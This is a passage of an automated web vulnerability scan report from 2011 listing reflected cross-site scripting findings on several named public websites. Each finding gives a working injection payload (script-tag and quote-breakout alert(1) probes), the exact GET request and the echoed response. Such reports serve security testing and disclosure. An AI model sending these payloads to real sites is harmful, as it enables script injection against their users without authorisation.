<input type=hidden value=/server-status59d76><script>alert(1)</script>51688ab36bf name=request>
...[SNIP]...

3.8. http://www.affordable-life-insurance-rates.org/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.affordable-life-insurance-rates.org
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7125'-alert(1)-'6fea77851a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusa7125'-alert(1)-'6fea77851a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.affordable-life-insurance-rates.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:40:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-2
Set-Cookie: PHPSESSID=047a304c19f16c1f7d49b4a5ea6f8dcd; path=/; domain=.affordable-life-insurance-rates.org
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>


<title>A
...[SNIP]...
<![CDATA[ */
   try {
       var pageTracker = _gat._getTracker("UA-10764129-34");
       pageTracker._setDomainName('.affordable-life-insurance-rates.org');
       pageTracker._trackPageview('/server-statusa7125'-alert(1)-'6fea77851a');
   }
   catch(err) {}
/* ]]>
...[SNIP]...

3.9. http://www.affordable-life-insurance-rates.org/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.affordable-life-insurance-rates.org
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc2b"><script>alert(1)</script>f408c2fb170 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status5fc2b"><script>alert(1)</script>f408c2fb170 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.affordable-life-insurance-rates.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:40:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-2
Set-Cookie: PHPSESSID=ad75cc07a80d2c5f2df2769f7e13cc96; path=/; domain=.affordable-life-insurance-rates.org
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>


<title>A
...[SNIP]...
<link rel="canonical" href="http://www.affordable-life-insurance-rates.org/server-status5fc2b"><script>alert(1)</script>f408c2fb170" />
...[SNIP]...

3.10. http://www.americanpregnancy.org/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.americanpregnancy.org
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a576c"><script>alert(1)</script>cda727bada6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusa576c"><script>alert(1)</script>cda727bada6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americanpregnancy.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:01:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 2522
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input name="referrer" id="referrer" type="text" value="http://www.americanpregnancy.org/server-statusa576c"><script>alert(1)</script>cda727bada6" />
...[SNIP]...

3.11. http://www.answerbag.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.answerbag.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 98799'><script>alert(1)</script>c6791048b4f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status98799'><script>alert(1)</script>c6791048b4f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.answerbag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:39:53 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=8a2c312ec0af2f338559abb0b979246c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org
...[SNIP]...
<meta property='og:url' content='http://www.answerbag.com/server-status98799'><script>alert(1)</script>c6791048b4f' />
...[SNIP]...

3.12. http://www.bomb-mp3.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bomb-mp3.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 94237<script>alert(1)</script>3271aa0ef4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status94237<script>alert(1)</script>3271aa0ef4c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bomb-mp3.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 21:23:23 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.12
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Content-Length: 726
Content-Type: text/html

<html>
   <head>
       <title>/server-status94237<script>alert(1)</script>3271aa0ef4c not found on www.bomb-mp3.com</title>
       <meta name="robots" content="noindex">
   </head>
   <body style="font-family:Lucida
...[SNIP]...
<h1>/server-status94237<script>alert(1)</script>3271aa0ef4c not found on bomb-mp3.com</h1>
...[SNIP]...

3.13. http://www.bomb-mp3.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bomb-mp3.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 30336</title><script>alert(1)</script>4c31be8f536 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status30336</title><script>alert(1)</script>4c31be8f536 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bomb-mp3.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 21:23:24 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.12
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Content-Length: 742
Content-Type: text/html

<html>
   <head>
       <title>/server-status30336</title><script>alert(1)</script>4c31be8f536 not found on www.bomb-mp3.com</title>
       <meta name="robots" content="noindex">
   </head>
   <body style="font-famil
...[SNIP]...

3.14. http://www.bomb-mp3.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bomb-mp3.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 908b8<script>alert(1)</script>bc22bb557de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?908b8<script>alert(1)</script>bc22bb557de=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bomb-mp3.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 21:23:19 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.12
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Content-Length: 732
Content-Type: text/html

<html>
   <head>
       <title>/server-status?908b8<script>alert(1)</script>bc22bb557de=1 not found on www.bomb-mp3.com</title>
       <meta name="robots" content="noindex">
   </head>
   <body style="font-family:Luc
...[SNIP]...
<h1>/server-status?908b8<script>alert(1)</script>bc22bb557de=1 not found on bomb-mp3.com</h1>
...[SNIP]...

3.15. http://www.bomb-mp3.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bomb-mp3.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload fb923</title><script>alert(1)</script>d5aad96fbcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?fb923</title><script>alert(1)</script>d5aad96fbcc=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bomb-mp3.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 21:23:19 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.12
X-Powered-By: PHP/5.2.12
Vary: Accept-Encoding
Content-Length: 748
Content-Type: text/html

<html>
   <head>
       <title>/server-status?fb923</title><script>alert(1)</script>d5aad96fbcc=1 not found on www.bomb-mp3.com</title>
       <meta name="robots" content="noindex">
   </head>
   <body style="font-fa
...[SNIP]...

3.16. http://www.bordersrewardsperks.com/server-info [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bordersrewardsperks.com
Path:   /server-info

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c7fdd--><a>e930c88041c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-infoc7fdd--><a>e930c88041c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bordersrewardsperks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Nxj-Sa: 2.114
X-Nxj-Release: empire_11.13.49147
X-Xrds-Location: http://www.bordersrewardsperks.com/nxj.xrds
X-Nxj-Auth: Security_AnonymousUser
Content-Type: text/html; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 01:57:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=4sbtsp8jgm1lk0g4ipsd0ef3k5; path=/
Set-Cookie: nxjsess-aid-borders=5138794564d968276af4a82.14699254; expires=Tue, 01-Apr-2031 22:12:29 GMT; path=/; domain=www.bordersrewardsperks.com
Content-Length: 90733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 Error</title
...[SNIP]...
<!-- static stylesheet could not be linked (server-infoc7fdd--><a>e930c88041cindex)-->
...[SNIP]...

3.17. http://www.bordersrewardsperks.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bordersrewardsperks.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3524f--><a>ce78954ff49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status3524f--><a>ce78954ff49 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bordersrewardsperks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Nxj-Sa: 2.109
X-Nxj-Release: empire_11.13.49147
X-Xrds-Location: http://www.bordersrewardsperks.com/nxj.xrds
X-Nxj-Auth: Security_AnonymousUser
Content-Type: text/html; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 02:32:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=fmgdk6hvdm8ml0mhp2f6cl7im6; path=/
Set-Cookie: nxjsess-aid-borders=15506284614d968ac301c1e3.64236962; expires=Tue, 01-Apr-2031 22:47:54 GMT; path=/; domain=www.bordersrewardsperks.com
Content-Length: 90739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 Error</title
...[SNIP]...
<!-- static stylesheet could not be linked (server-status3524f--><a>ce78954ff49index)-->
...[SNIP]...

3.18. http://www.businessworkforce.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.businessworkforce.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 1150b><a>8cc0e9a51c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status?1150b><a>8cc0e9a51c9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.businessworkforce.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404
Cache-Control: private
Content-Length: 20187
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: PORTAL=PARTNER=BUSINESSWORKFORCE%2ECOM&CookieVersion=2%2E0&USERCOUNTRY=US&USERGID=434780717746428821&HTTPREFERRER=&USERSTATE=TEXAS&NEWUSERSITE=&DIDIPLKUP=Y; expires=Sat, 31-Mar-2012 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 02:05:03 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/cs
...[SNIP]...
orce.com&t_pgid=638824041076414312&t_sn=/common/error/checkurl.asp&t_httph=www.businessworkforce.com&t_httpurl=/common/error/checkurl.asp&t_httpqs=404;http://www.businessworkforce.com:80/server-status?1150b><a>8cc0e9a51c9=1&t_sgid=526128553523471524&t_ws=COLO-WEB06&t_ugid=434780717746428821&f_ip=173.193.214.243&ud=>
...[SNIP]...

3.19. http://www.calorie-count.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.calorie-count.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c17f<script>alert(1)</script>4194e5c342e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status4c17f<script>alert(1)</script>4194e5c342e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.calorie-count.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:26:57 GMT
Server: Apache
Content-Length: 2488
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 - Page Not Found</title>
<style type="text/css">
body {
   background-color: #F2EFE8;
   font-family: verdana, sans-serif
...[SNIP]...
<strong>http://www.calorie-count.com/server-status4c17f<script>alert(1)</script>4194e5c342e</strong>
...[SNIP]...

3.20. http://www.calorie-count.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.calorie-count.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dcfc1<script>alert(1)</script>f731867d4e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?dcfc1<script>alert(1)</script>f731867d4e2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.calorie-count.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:26:56 GMT
Server: Apache
Content-Length: 2491
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 - Page Not Found</title>
<style type="text/css">
body {
   background-color: #F2EFE8;
   font-family: verdana, sans-serif
...[SNIP]...
<strong>http://www.calorie-count.com/server-status?dcfc1<script>alert(1)</script>f731867d4e2=1</strong>
...[SNIP]...

3.21. http://www.circleofmoms.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.circleofmoms.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4f323'><script>alert(1)</script>eae7495b66b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4f323'><script>alert(1)</script>eae7495b66b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.circleofmoms.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:19:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: vis=%22vid%3D25838395085%26sig%3Daa62b5cc72636bcd8f6c666af3d43a17%22; expires=Thu, 31-Mar-2016 02:19:34 GMT; path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<fb:login-button onlogin='window.location="http://www.circleofmoms.com/4f323'><script>alert(1)</script>eae7495b66b?fb_connect_ver=1";' style='float:right;'>
...[SNIP]...

3.22. http://www.circleofmoms.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.circleofmoms.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19560"><script>alert(1)</script>687e637b7eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /19560"><script>alert(1)</script>687e637b7eb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.circleofmoms.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:19:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: vis=%22vid%3D25838395082%26sig%3D83aa13ea407a54cb089874e4d6a1b187%22; expires=Thu, 31-Mar-2016 02:19:33 GMT; path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.circleofmoms.com/19560"><script>alert(1)</script>687e637b7eb" />
...[SNIP]...

3.23. http://www.circleofmoms.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.circleofmoms.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f457'-alert(1)-'8c110367aad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /7f457'-alert(1)-'8c110367aad HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.circleofmoms.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:19:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: vis=%22vid%3D25838395092%26sig%3Db0926a603015e349aeefe30d8d964d41%22; expires=Thu, 31-Mar-2016 02:19:34 GMT; path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
ntr_uid":0,"timestamp":1301710774,"buh":"3497390094b0f9d45ce0c2f958a02bae","url_ver":"1"},'5','5','1','http://www.circleofmoms.com/','http://www.circleofmoms.com/','25a1e39226da30cbcebb9d6dc591d1e1', '7f457'-alert(1)-'8c110367aad');</script>
...[SNIP]...

3.24. http://www.cj.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cj.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c85b4"><script>alert(1)</script>23c8d7fd070 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?c85b4"><script>alert(1)</script>23c8d7fd070=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cj.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Server: Apache
Vary: Accept-Encoding
Content-Length: 20816
Content-Type: text/html
Date: Sat, 02 Apr 2011 02:25:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="https://members.cj.com/member/login?nextpage=http://www.cj.com/server-status?c85b4"><script>alert(1)</script>23c8d7fd070=1">
...[SNIP]...

3.25. http://www.classesandcareers.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classesandcareers.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd66b"-alert(1)-"7988eaf8949 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusdd66b"-alert(1)-"7988eaf8949 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.classesandcareers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:27:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.2
X-Runtime: 4923
Cache-Control: no-cache
Set-Cookie: message=The+page+you+requested+was+not+found.; path=/
Content-Length: 32842
Status: 404
Cache-Control: max-age=1800
Expires: Sat, 02 Apr 2011 02:57:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<script language="JavaScript">

   /* You may give each page an identifying name, server, and channel on
    the next lines. */
   s.pageName = "/server-statusdd66b"-alert(1)-"7988eaf8949";
   s.server = ""
   s.channel = ""
   s.pageType = ""
   s.prop1 = ""
   s.prop2 = ""
   s.prop3 = ""
   s.prop4 = ""
   s.prop5 = ""
   s.prop6 = ""
   s.eVar5 = ""
   s.events = ""
   if (typeof(searchSource) != 'undefin
...[SNIP]...

3.26. http://www.collegehumor.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfe4c"-alert(1)-"9357ab539ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusdfe4c"-alert(1)-"9357ab539ea HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 02:59:57 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 02:59:58 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 02:59:57 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=b1ecb62876e36a510d8955dde60890013adccb7b; expires=Fri, 01-Apr-2016 08:03:48 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=b1ecb62876e36a510d8955dde60890013adccb7b; expires=Fri, 01-Apr-2016 08:03:48 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
